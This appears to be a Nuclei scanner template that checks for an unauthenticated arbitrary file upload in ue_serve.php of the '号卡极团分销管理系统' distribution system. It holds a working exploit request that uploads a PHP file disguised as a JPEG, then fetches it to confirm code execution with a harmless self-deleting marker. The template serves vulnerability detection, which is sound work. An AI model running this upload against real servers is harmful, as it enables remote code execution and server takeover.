http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - (\w+_test\.php)
          type: regex
      matchers:
        - part: body
          type: word
          words:
            - "24642"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
          Host: {{Hostname}}
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylkv1kpsZgzw2WC03

          ------WebKitFormBoundarylkv1kpsZgzw2WC03
          Content-Disposition: form-data; name="name"

          test.php
          ------WebKitFormBoundarylkv1kpsZgzw2WC03
          Content-Disposition: form-data; name="upfile"; filename="test.php"
          Content-Type: image/jpeg

          <?php print(111*222);unlink(__FILE__);?>
          ------WebKitFormBoundarylkv1kpsZgzw2WC03--
        - |
          GET /upload/{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
id: haoka-file-upload
info:
    author: Superhero
    description: 号卡极团分销管理系统ue_serve.php存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 号卡极团分销管理系统 ue_serve.php 任意文件上传
    severity: critical
    tags:
        - files-upload
